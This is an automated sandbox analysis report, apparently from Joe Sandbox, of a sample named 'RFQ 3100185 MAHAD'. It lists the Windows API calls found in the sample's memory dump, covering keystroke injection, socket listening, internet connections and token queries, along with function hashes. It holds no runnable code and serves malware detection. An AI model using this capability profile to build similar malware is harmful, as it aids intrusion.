                                                            • Instruction Fuzzy Hash: E241F975600748EFDF12EF54C85ABEE7BB5AF49700F000059F905A7281DB789A56CB91
                                                            APIs
                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007F3966
                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 007F3982
                                                            • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 007F39EF
                                                            • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 007F3A4D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: ea96fe7536fde94b6705c9228ed511ded6f8da53c739fb0af3d8f1a7610c492b
                                                            • Instruction ID: 499cf6e5bf8cd460d09dd8e488ece85c8210b0f88656a1e8f2001b36c170bab2
                                                            • Opcode Fuzzy Hash: ea96fe7536fde94b6705c9228ed511ded6f8da53c739fb0af3d8f1a7610c492b
                                                            • Instruction Fuzzy Hash: 52412570A0424CAAEF20CB65880ABFDBBB9AB55324F04415AF6C1963C1C7FC9E85D761
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007FE742
                                                            • GetLastError.KERNEL32(?,00000000), ref: 007FE768
                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007FE78D
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007FE7B9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            • Opcode ID: df2d6d68a3395c5b9e0eaa5171e9fed0646d307df86f23d39f8c3b5b1c7a1504
                                                            • Instruction ID: c94f20bae882a9dc8469fe370ebb30fe2f2bd202db821c77cdcdaea275f91a5c
                                                            • Opcode Fuzzy Hash: df2d6d68a3395c5b9e0eaa5171e9fed0646d307df86f23d39f8c3b5b1c7a1504
                                                            • Instruction Fuzzy Hash: 9B415B39200614DFCF11EF15C548A9DBBE5BF99710B098498EA56AB3B2CB38FC00CB91
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0081B5D1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: 1e9a6287057e8943a38f8bb333cbdb5e4f3fe3a3e326ae4f4e78db609aa2462b
                                                            • Instruction ID: 722a1fa871499eebda8bb5ef57d8b18b748eaaa05bbc1da62eae14ccfa6b6662
                                                            • Opcode Fuzzy Hash: 1e9a6287057e8943a38f8bb333cbdb5e4f3fe3a3e326ae4f4e78db609aa2462b
                                                            • Instruction Fuzzy Hash: 1B31BA74601208AFEF209F58CC89FE8376EFF65354F644515FA12D62E1D730E9C08A91
                                                            APIs
                                                            • ClientToScreen.USER32(?,?), ref: 0081D807
                                                            • GetWindowRect.USER32(?,?), ref: 0081D87D
                                                            • PtInRect.USER32(?,?,0081ED5A), ref: 0081D88D
                                                            • MessageBeep.USER32(00000000), ref: 0081D8FE
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: 39ee8190699bdd0dd083f8c73ad9988e07e71c58cde1cca3da997bdaf6c3776f
                                                            • Instruction ID: 803a68e585decc6309124ad5e89dffd2908af8a6453b5e28819505db0336cdd4
                                                            • Opcode Fuzzy Hash: 39ee8190699bdd0dd083f8c73ad9988e07e71c58cde1cca3da997bdaf6c3776f
                                                            • Instruction Fuzzy Hash: 95414570A00219DFCF11DF58D888BA97BB9FF58315F1889A9E818DB264D730E981CB40
                                                            APIs
                                                            • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 007F3AB8
                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 007F3AD4
                                                            • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 007F3B34
                                                            • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 007F3B92
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 5a1468dc5bb990f659d9ef36298a08ccf43a401227987750222a4e3f703e7657
                                                            • Instruction ID: c4c216d056ef4a9f4b420b7c1b8badd9872fb7c62dbccc4c4b7b88a8053c9903
                                                            • Opcode Fuzzy Hash: 5a1468dc5bb990f659d9ef36298a08ccf43a401227987750222a4e3f703e7657
                                                            • Instruction Fuzzy Hash: F03124B1A0035CEEEF218B64882DBFE7BA9AB55310F04015AE681973D2C77C8F45D761
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007E4038
                                                            • __isleadbyte_l.LIBCMT ref: 007E4066
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 007E4094
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 007E40CA
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: cc98e91f5243145c05407a1455344b75c9e0a146a43df400c32564bbe58e34a2
                                                            • Instruction ID: eb26d05fbd5f64670e0fb84611d1f9d12d19139a4e05dc3fe1cb0d118375241e
                                                            • Opcode Fuzzy Hash: cc98e91f5243145c05407a1455344b75c9e0a146a43df400c32564bbe58e34a2
                                                            • Instruction Fuzzy Hash: 6131E431601286EFDF219F36C844B7A7BB5FF48310F1544B9E6658B191E739D890D790
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00817CB9
                                                              • Part of subcall function 007F5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 007F5F6F
                                                              • Part of subcall function 007F5F55: GetCurrentThreadId.KERNEL32 ref: 007F5F76
                                                              • Part of subcall function 007F5F55: AttachThreadInput.USER32(00000000,?,007F781F), ref: 007F5F7D
                                                            • GetCaretPos.USER32(?), ref: 00817CCA
                                                            • ClientToScreen.USER32(00000000,?), ref: 00817D03
                                                            • GetForegroundWindow.USER32 ref: 00817D09
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            • Opcode ID: 10f9c4033e3febf87ddc939d4360848cb1171c652daa72261ea4c49ff30d090c
                                                            • Instruction ID: ebb4062f468388f64fd2a67885ba884a97615b3f9f728fb543168b2998eb56fc
                                                            • Opcode Fuzzy Hash: 10f9c4033e3febf87ddc939d4360848cb1171c652daa72261ea4c49ff30d090c
                                                            • Instruction Fuzzy Hash: 6A312F72900108AFDB10EFA9DC45DEFFBFDEF98314B10846AE915E7211DA359E458BA0
                                                            APIs
                                                              • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                            • GetCursorPos.USER32(?), ref: 0081F211
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0082E4C0,?,?,?,?,?), ref: 0081F226
                                                            • GetCursorPos.USER32(?), ref: 0081F270
                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0082E4C0,?,?,?), ref: 0081F2A6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            • Opcode ID: 65be7a52a91685db726fdce3ee0ca7504d8a68bed93de77f6314ffedfcae1578
                                                            • Instruction ID: b398eb099a14916f41270e059c602051b1afb625e1461c3c5133aa4d6528eaa6
                                                            • Opcode Fuzzy Hash: 65be7a52a91685db726fdce3ee0ca7504d8a68bed93de77f6314ffedfcae1578
                                                            • Instruction Fuzzy Hash: C221B179500128EFCF258F98D859EEE7BB9FF4A710F048069FA09872A2D3349D90DB50
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00804358
                                                              • Part of subcall function 008043E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00804401
                                                              • Part of subcall function 008043E2: InternetCloseHandle.WININET(00000000), ref: 0080449E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseConnectHandleOpen
                                                            • String ID:
                                                            • API String ID: 1463438336-0
                                                            • Opcode ID: 72fb104114ef2aaaf44d2e4c67769abbdbb372910baa00556c60d2ad3518108e
                                                            • Instruction ID: 83fb71c56a3357d054dd03de947a576f0450d3bc2ca7980237bca855553a3119
                                                            • Opcode Fuzzy Hash: 72fb104114ef2aaaf44d2e4c67769abbdbb372910baa00556c60d2ad3518108e
                                                            • Instruction Fuzzy Hash: D221D1B5240B05BBEB519F60EC01FBBB7A9FF84714F11601AFB15D6690DB7198209BA0
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00818AA6
                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00818AC0
                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00818ACE
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00818ADC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$AttributesLayered
                                                            • String ID:
                                                            • API String ID: 2169480361-0
                                                            • Opcode ID: ee8c93196a66edd984697de00e17042e1d91011ee72c253816a7cc2378522873
                                                            • Instruction ID: e878332bec73ae5a8fe91034be9453e64e86dd56ac0aca4f2b8016b5c45ecf6e
                                                            • Opcode Fuzzy Hash: ee8c93196a66edd984697de00e17042e1d91011ee72c253816a7cc2378522873
                                                            • Instruction Fuzzy Hash: 12116A31205125AFD714AB28DC0AFAA779DFF85320F14451AF916C72A2DB64AC418795
                                                            APIs
                                                            • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00808AE0
                                                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00808AF2
                                                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00808AFF
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00808B16
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastacceptselect
                                                            • String ID:
                                                            • API String ID: 385091864-0
                                                            • Opcode ID: 564f006a10ed801c282094997eeaa9761408a1148754be57c69bf5d5f73ef252
                                                            • Instruction ID: 934267966cb770af8c86e44429b57a7646a4697ab93994864ba89da6ef9e81fb
                                                            • Opcode Fuzzy Hash: 564f006a10ed801c282094997eeaa9761408a1148754be57c69bf5d5f73ef252
                                                            • Instruction Fuzzy Hash: 07216672A001249FC7219F69DC99A9EBBECFF89350F00456AF849D7291DB7499418F90
                                                            APIs
                                                              • Part of subcall function 007F1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,007F0ABB,?,?,?,007F187A,00000000,000000EF,00000119,?,?), ref: 007F1E77
                                                              • Part of subcall function 007F1E68: lstrcpyW.KERNEL32(00000000,?,?,007F0ABB,?,?,?,007F187A,00000000,000000EF,00000119,?,?,00000000), ref: 007F1E9D
                                                              • Part of subcall function 007F1E68: lstrcmpiW.KERNEL32(00000000,?,007F0ABB,?,?,?,007F187A,00000000,000000EF,00000119,?,?), ref: 007F1ECE
                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,007F187A,00000000,000000EF,00000119,?,?,00000000), ref: 007F0AD4
                                                            • lstrcpyW.KERNEL32(00000000,?,?,007F187A,00000000,000000EF,00000119,?,?,00000000), ref: 007F0AFA
                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,007F187A,00000000,000000EF,00000119,?,?,00000000), ref: 007F0B2E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: lstrcmpilstrcpylstrlen
                                                            • String ID: cdecl
                                                            • API String ID: 4031866154-3896280584
                                                            • Opcode ID: a56633f37324ebff1dfe9a1898bb375c6ff9fce1bbbbc9eef31ee040c3607850
                                                            • Instruction ID: 6098357fe1759112df80168805a1385c38ff96355d409f4478e4651f847afb10
                                                            • Opcode Fuzzy Hash: a56633f37324ebff1dfe9a1898bb375c6ff9fce1bbbbc9eef31ee040c3607850
                                                            • Instruction Fuzzy Hash: 9411BE76200309EFDB25AF34DC09E7A77A9FF45310B80406AEA06CB391EB759850C7E0
                                                            APIs
                                                            • _free.LIBCMT ref: 007E2FB5
                                                              • Part of subcall function 007D395C: __FF_MSGBANNER.LIBCMT ref: 007D3973
                                                              • Part of subcall function 007D395C: __NMSG_WRITE.LIBCMT ref: 007D397A
                                                              • Part of subcall function 007D395C: RtlAllocateHeap.NTDLL(01240000,00000000,00000001,00000001,00000000,?,?,007CF507,?,0000000E), ref: 007D399F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: f7ef7585f79f83ef7d44dd6e8029f5927a4a427bb3494c0156aef1f5a3d5377f
                                                            • Instruction ID: e8df54f9e03921d15f13e6b222a84223f0f528cda6a6a8bc3c9965f4eb70820a
                                                            • Opcode Fuzzy Hash: f7ef7585f79f83ef7d44dd6e8029f5927a4a427bb3494c0156aef1f5a3d5377f
                                                            • Instruction Fuzzy Hash: 3811EB3140A251EFDB213B71AC0D6593BACAF483A4F204C16F80D9A252EA3CCD40CAA0
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007F05AC
                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 007F05C7
                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007F05DD
                                                            • FreeLibrary.KERNEL32(?), ref: 007F0632
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                            • String ID:
                                                            • API String ID: 3137044355-0
                                                            • Opcode ID: 1595b4cd06ff7446c962cefbf9ade6167f7240bfb101a82c9f503b201dc65e5a
                                                            • Instruction ID: f7e10d5a56a11f2ac5c7c67f76931de75488aa8f2777d926ffaa60652cc8fb3c
                                                            • Opcode Fuzzy Hash: 1595b4cd06ff7446c962cefbf9ade6167f7240bfb101a82c9f503b201dc65e5a
                                                            • Instruction Fuzzy Hash: C221517190020DEBDB208F91DC88AEAB7B8EF40700F108469E616D2351D774EA559B91
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007F6733
                                                            • _memset.LIBCMT ref: 007F6754
                                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007F67A6
                                                            • CloseHandle.KERNEL32(00000000), ref: 007F67AF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                                            • String ID:
                                                            • API String ID: 1157408455-0
                                                            • Opcode ID: f446c1ad9aadb8cf88ceff2b05909be290ab7f3195175bbb6cacd103cde69266
                                                            • Instruction ID: 80ea37738fe7f266d27df6709b5b1847820bb5a5b12ae50dbf42520bfdb59bcc
                                                            • Opcode Fuzzy Hash: f446c1ad9aadb8cf88ceff2b05909be290ab7f3195175bbb6cacd103cde69266
                                                            • Instruction Fuzzy Hash: 9B110A72901228BAE72067A5AC4DFAFBABCEF44724F10459AF504E72C0D2745E808BB4
                                                            APIs
                                                              • Part of subcall function 007EAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007EAA79
                                                              • Part of subcall function 007EAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007EAA83
                                                              • Part of subcall function 007EAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007EAA92
                                                              • Part of subcall function 007EAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007EAA99
                                                              • Part of subcall function 007EAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007EAAAF
                                                            • GetLengthSid.ADVAPI32(?,00000000,007EADE4,?,?), ref: 007EB21B
                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007EB227
                                                            • HeapAlloc.KERNEL32(00000000), ref: 007EB22E
                                                            • CopySid.ADVAPI32(?,00000000,?), ref: 007EB247
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                            • String ID:
                                                            • API String ID: 4217664535-0
